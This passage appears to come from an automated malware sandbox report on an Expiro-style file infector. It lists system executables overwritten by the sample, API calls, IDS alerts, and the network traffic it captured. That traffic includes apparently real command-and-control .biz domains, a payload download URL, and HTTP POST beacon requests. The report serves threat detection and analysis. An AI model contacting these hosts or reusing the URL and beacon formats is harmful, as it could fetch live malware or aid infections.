                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | System file written: C:\Windows\System32\FXSSVC.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | System file written: C:\Windows\System32\alg.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\7-Zip\7zFM.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02CF5908
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,7_2_00EF0207
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,7_2_00EF589A
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,7_2_00EF4EC1
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose,7_2_00F03E66
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,7_2_00EE532E
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_00EF589A
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_00EF0207
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_00EF4EC1
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose,15_2_00F03E66
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_00EE532E
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 02337394h14_2_02337099
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 023378DCh14_2_0233767B
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_02337E60
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_02337E5E
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_02337FBC

                    Networking

                    Source: Network traffic  Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:49753 -> 54.244.188.177:80
                    Source: Network traffic  Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:55012 -> 1.1.1.1:53
                    Source: Network traffic  Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:52903 -> 1.1.1.1:53
                    Source: Network traffic  Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:54094 -> 1.1.1.1:53
                    Source: Network traffic  Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:54498 -> 1.1.1.1:53
                    Source: Network traffic  Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:55974 -> 1.1.1.1:53
                    Source: Network traffic  Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:49867 -> 82.112.184.197:80
                    Source: Network traffic  Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50012 -> 18.141.10.107:80
                    Source: Network traffic  Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:64255 -> 1.1.1.1:53
                    Source: Network traffic  Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50077 -> 18.246.231.120:80
                    Source: Malware configuration extractor  URLs: https://gxe0.com/yak2/233_Juqmtmyadyy
                    Source: unknown  DNS traffic detected: English language letter frequency does not match the domain names
                    Source: unknown  Network traffic detected: DNS query count 63
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe  Code function: 0_2_02D0E4B8 InternetCheckConnectionA,  0_2_02D0E4B8
                    Source: global traffic  TCP traffic: 192.168.2.10:49774 -> 51.195.88.199:587
                    Source: unknown  DNS query: name: api.ipify.org
                    Source: unknown  DNS query: name: api.ipify.org
                    Source: Network traffic  Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49708 -> 198.252.105.91:443
                    Source: Network traffic  Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.10:49744
                    Source: Network traffic  Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.10:49757
                    Source: Network traffic  Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.10:49744
                    Source: Network traffic  Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.10:49757
                    Source: Network traffic  Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.10:49773
                    Source: Network traffic  Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.10:49773
                    Source: Network traffic  Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.10:50017
                    Source: Network traffic  Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.10:50017
                    Source: Network traffic  Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.10:50016
                    Source: Network traffic  Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.10:50018
                    Source: Network traffic  Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.10:50016
                    Source: Network traffic  Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.10:50018
                    Source: Network traffic  Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.10:50029
                    Source: Network traffic  Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.10:50029
                    Source: Network traffic  Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.10:50031
                    Source: Network traffic  Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.10:50031
                    Source: Network traffic  Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.10:50077
                    Source: Network traffic  Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.10:50077
                    Source: Network traffic  Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.10:50015
                    Source: Network traffic  Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.10:50015
                    Source: Network traffic  Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.10:50078
                    Source: Network traffic  Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.10:50086
                    Source: Network traffic  Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.10:50086
                    Source: Network traffic  Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.10:50078
                    Source: global traffic  TCP traffic: 192.168.2.10:49774 -> 51.195.88.199:587
                    Source: global traffic  HTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1  Connection: Keep-Alive  Accept: */*  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)  Host: gxe0.com
                    Source: global traffic  HTTP traffic detected: GET / HTTP/1.1  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0  Host: api.ipify.org  Connection: Keep-Alive
                    Source: global traffic  HTTP traffic detected: GET / HTTP/1.1  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0  Host: api.ipify.org  Connection: Keep-Alive
                    Source: global traffic  HTTP traffic detected: POST /omhtttbpfwdopn HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: pywolwnvd.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 836
                    Source: global traffic  HTTP traffic detected: POST /ulvxycyjutwdmypq HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: pywolwnvd.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /nkbiquv HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: ssbzmoy.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 836
                    Source: global traffic  HTTP traffic detected: POST /eupqxdgegqjrgdpv HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: ssbzmoy.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /irvq HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: cvgrf.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 836
                    Source: global traffic  HTTP traffic detected: POST /s HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: cvgrf.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /xwcotmorefmmtc HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: npukfztj.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 836
                    Source: global traffic  HTTP traffic detected: POST /kgrfegimyutt HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: przvgke.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 836
                    Source: global traffic  HTTP traffic detected: POST /rvwdmrjan HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: npukfztj.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /mbuec HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: przvgke.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 836
                    Source: global traffic  HTTP traffic detected: POST /avc HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: przvgke.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /qmpy HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: knjghuig.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 836
                    Source: global traffic  HTTP traffic detected: POST /blhkiobysomvisx HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: przvgke.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /aatpwqmmnwrfjm HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: knjghuig.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /hrkmkab HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: lpuegx.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /tkvpxcpexicoa HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: pywolwnvd.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 834
